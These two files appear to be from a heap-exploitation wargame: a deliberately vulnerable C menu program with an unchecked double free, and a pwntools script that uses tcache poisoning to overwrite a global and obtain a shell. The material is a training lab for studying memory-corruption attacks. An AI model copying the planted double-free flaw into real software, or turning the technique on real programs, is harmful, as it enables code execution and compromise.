File: Heap/Tcache/Tcache_dup/tcache_dup2.c
// gcc -o tcache_dup2 tcache_dup2.c -no-pie
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char name[16];
int overwrite_me;

int main()
{
	int ch, idx;
	int i = 0;
	char *ptr[10];
	
	setvbuf(stdout, 0, 2, 0);
	setvbuf(stdin, 0, 2, 0);
	
	printf("Name : ");
	read(0, name, 16);
	
	while (1) {
	    
		printf("> ");
		scanf("%d", &ch);
		
		switch(ch) {
			case 1:                            
				if( i >= 10 ) {
					printf("Do not overflow\n");
					exit(0);
				} 
				ptr[i] = malloc(32);
				printf("Data: ");
				read(0, ptr[i], 32-1);
				i++;
				break;
				
			case 2:
				printf("idx: ");
				scanf("%d", &idx);
				free(ptr[idx]);
				break;
				
			case 3:
				if( overwrite_me == 0xDEADBEEF ) {
					system("/bin/sh");
				}
				break;
				
			default:
				break;
		}
	}
	
	return 0;
	
}

File: dreamhack-io/Heap/Tcache/Tcache_dup/tcache_dup2.py
# tcache_dup2.py

from pwn import *
p = process("./tcache_dup2")

def add(data):
	print p.sendlineafter(">","1")
	print p.sendlineafter(":",str(data))
def free(idx):
	print p.sendlineafter(">","2")
	print p.sendlineafter(":",str(idx))
def getshell():
	print p.sendlineafter(">","3")
elf = ELF('./tcache_dup2')
overwrite_me = elf.symbols['overwrite_me']

print p.sendlineafter("Name :", "AAAA")
add("AAAA")
free(0)
free(0)  
add(p64(overwrite_me)) 
add("BBBB") 
add(p64(0xDEADBEEF)) 
getshell()
p.interactive()